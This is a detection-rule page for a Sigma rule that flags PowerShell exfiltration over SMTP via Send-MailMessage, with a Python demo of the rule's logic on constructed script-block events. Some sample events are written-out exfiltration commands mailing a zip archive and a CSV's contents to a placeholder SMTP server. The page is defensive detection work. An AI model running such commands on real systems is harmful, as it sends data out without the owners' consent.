Powershell Exfiltration Over SMTP
Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Sigma rule
```yaml
title: Powershell Exfiltration Over SMTP
id: 9a7afa56-4762-43eb-807d-c3dc9ffe211b
status: test
description: |
    Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.
    The data may also be sent to an alternate network location from the main command and control server.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp
    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.4
    - https://www.ietf.org/rfc/rfc2821.txt
author: frack113
date: 2022-09-26
tags:
    - attack.exfiltration
    - attack.t1048.003
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection:
        ScriptBlockText|contains: 'Send-MailMessage'
    filter:
        ScriptBlockText|contains: 'CmdletsToExport'
    condition: selection and not filter
falsepositives:
    - Legitimate script
level: medium
```
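The following is an added illustration, not part of the rule or the Sigma project, of how the rule's `selection and not filter` logic behaves when applied to PowerShell Event ID 4104 script-block records. The events are constructed sample data; Sigma's `contains` modifier is matched case-insensitively, which is why the lowercase `send-mailmessage` variant still alerts, while a module manifest whose `CmdletsToExport` list names the cmdlet is suppressed by the filter.

```python
"""Apply the Sigma rule's detection logic to sample 4104 script-block events."""
from dataclasses import dataclass


@dataclass
class ScriptBlockEvent:
    """Minimal stand-in for a Windows PowerShell Event ID 4104 record."""
    record_id: int
    script_block_text: str


def sigma_contains(value: str, needle: str) -> bool:
    """Sigma's 'contains' modifier matches case-insensitively by default."""
    return needle.lower() in value.lower()


def matches_rule(event: ScriptBlockEvent) -> bool:
    """condition: selection and not filter, exactly as the rule is written."""
    selection = sigma_contains(event.script_block_text, "Send-MailMessage")
    filt = sigma_contains(event.script_block_text, "CmdletsToExport")
    return selection and not filt


def alert_ids(events) -> list:
    """Return the record ids that the rule would raise an alert for."""
    return [e.record_id for e in events if matches_rule(e)]


# Constructed sample events (not real telemetry); hostnames use .invalid.
SAMPLE_EVENTS = [
    ScriptBlockEvent(1, "Send-MailMessage -From 'a@example.invalid' -To 'b@example.invalid' "
                        "-Subject 'report' -Attachments 'C:\\Temp\\export.zip' "
                        "-SmtpServer 'mail.example.invalid'"),
    ScriptBlockEvent(2, "Get-Process | Where-Object CPU -gt 100"),
    # Module manifest content as it appears when a .psd1 is logged: the filter drops it.
    ScriptBlockEvent(3, "CmdletsToExport = @('Send-MailMessage', 'Get-Date', 'Write-Host')"),
    # Cmdlet names are case-insensitive in PowerShell, so the lowercase form must still match.
    ScriptBlockEvent(4, "send-mailmessage -smtpserver 'mail.example.invalid' "
                        "-Body (Get-Content .\\inventory.csv -Raw)"),
]

if __name__ == "__main__":
    print(alert_ids(SAMPLE_EVENTS))  # [1, 4]
```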
Related rules
- Data Exfiltration with Wget
- PowerShell ICMP Exfiltration
- Suspicious DNS Query with B64 Encoded String
- Suspicious Outbound SMTP Connections
- Suspicious WebDav Client Execution Via Rundll32.EXE